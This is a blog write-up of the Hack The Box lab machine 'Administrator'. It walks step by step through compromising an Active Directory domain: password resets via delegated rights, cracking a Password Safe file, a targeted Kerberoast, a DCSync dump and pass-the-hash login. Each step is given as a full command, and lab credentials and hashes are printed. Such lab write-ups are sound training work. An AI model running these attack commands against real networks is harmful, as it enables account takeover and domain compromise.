Hack The Box - Administrator Writeup

June 13, 2026

ctf
windows
active directory

A medium-rated active directory box which involves chaining rights abuses to compromise users, gain access to FTP to discover a Password Safe file and execute a targeted Kerberoast and DCSync attack to compromise the domain.

This is a walkthrough of the machine Administrator from Hack The Box.

Machine information:

  • Difficulty: Medium
  • OS: Windows
  • Area of interest: Enterprise Network, Vulnerability Assessment, Active Directory, Protocols, Common Services, Security Tools
  • Vulnerability: Group Membership, Misconfiguration
  • Language: Powershell
  • Technology: SMB, FTP, Kerberos, WinRM
  • Technique: Reconnaissance, Password Cracking, Kerberoasting

Nmap

sudo nmap -A -sC -sV --open -v -p- <IP>

Starting off with an Nmap scan, we discover that the machine is a domain controller, and that the domain name is administrator.htb.

Initial access

We are provided with the following credentials to start off the box:

Olivia
ichliebedich

Firstly, we can use evil-winrm to get a shell as olivia:

evil-winrm -i <IP> -u olivia -p ichliebedich

Domain enumeration with BloodHound

Owning michael

Next, we will upload the SharpHound executable, start the collector and ingest the files into BloodHound

Looking at olivia's outbound controls, we discover that we have GenericAll over michael - this grants us full control over michael:

Clicking on the GenericAll edge in BloodHound, we can find multiple ways to abuse this right, for our purposes we will reset michael's password:

net user michael michael123! /domain

Resetting michael's password will allow us to use WinRM and get access as this user - as michael is also part of the Remote Management Users group:

evil-winrm -i <IP> -u michael -p michael123!

Owning benjamin

After using evil-winrm to get access as michael, we will go back to BloodHound and see what else we can abuse to further our access.

Looking at michael's outbound object controls, we find that we have ForceChangePassword over benjamin:

Clicking on the ForceChangePassword edge, we can find a method to abuse this right with PowerView:

First, we will upload PowerView via evil-winrm, and import it:

upload powerview.ps1

Import-Module .\powerview.ps1

And then reset benjamin's password:

$UserPassword = ConvertTo-SecureString 'benjamin123!' -AsPlainText -Force;Set-DomainUserPassword -Identity benjamin -AccountPassword $UserPassword

FTP Enumeration

The user benjamin is not part of the Remote Management Users group, however using netexec with benjamin's credentials, we discover that we can now access FTP on the machine:

netexec ftp <IP> -u benjamin -p 'benjamin123!'

Looking at what's available via FTP, we find a file named Backup.psafe3.

ftp <IP>

This is a Password Safe file, which is password-protected.

We can crack it using hashcat, which reveals the password tekieromucho:

hashcat -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt --force

To open it, we can use the pwsafe command, and enter the password when prompted:

pwsafe Backup.psafe3

The file contains credentials for three additional users:

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

Initial access as emily for the user flag

We can use emily's credentials to evil-winrm into the machine, and read the first user.txt flag:

evil-winrm -i <IP> -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Owning ethan

Going back to BloodHound, we find that emily has GenericWrite over ethan - which we can abuse to assign an SPN to ethan, and perform a targeted Kerberoast:

Executing the attack, we get ethan's hash:

faketime "$(ntpdate -q <IP> | cut -d ' ' -f 1,2)" ./targetedKerberoast.py -d administrator.htb -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip <IP>

This box is finicky at this point, and you will probably get the error "Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)" - use faketime to fix this as shown above.

Using hashcat, we find ethan's password - limpbizkit:

hashcat -m 13100 ethan.kerberoast /usr/share/wordlists/rockyou.txt --force

Privilege escalation

Going back to BloodHound for the final time, we find that ethan has GetChangesAll and GetChanges over the domain, allowing us to execute a DCSync:

Executing the attack with impacket-secretsdump, we find Administrator's hash, which we can use to evil-winrm into the machine, and read the second root.txt flag:

impacket-secretsdump 'administrator.htb'/'ethan':'limpbizkit'@<IP>

evil-winrm -i <IP> -u administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e

Related Articles
Hack The Box - Return Writeup
June 13, 2026
ctf
windows
active directory
An easy-rated active directory box involving LDAP and plaintext credentials for initial access, and abusing services to run a malicious image and obtain a SYSTEM shell.
Hack The Box - Cicada Writeup
June 12, 2026
ctf
windows
active directory
An easy-rated Active Directory box involving SMB enumeration, hardcoded credentials and user enumeration for initial access, ending with SeBackupPrivilege abuse to dump NTLM hashes and gain administrator access.
Hack The Box - Sauna Writeup
June 10, 2026
ctf
windows
active directory
An easy-rated Active Directory box involving web enumeration and AS-REP roasting for initial access, AutoLogon credentials for lateral movement, and abusing rights to achieve DCSync - leading to full domain compromise.
Karam Chatra
Blog
Karam Chatra
Junior Threat Intelligence Analyst
Navigation
HomeBlogDisclaimer
© 2026 Karam Chatra.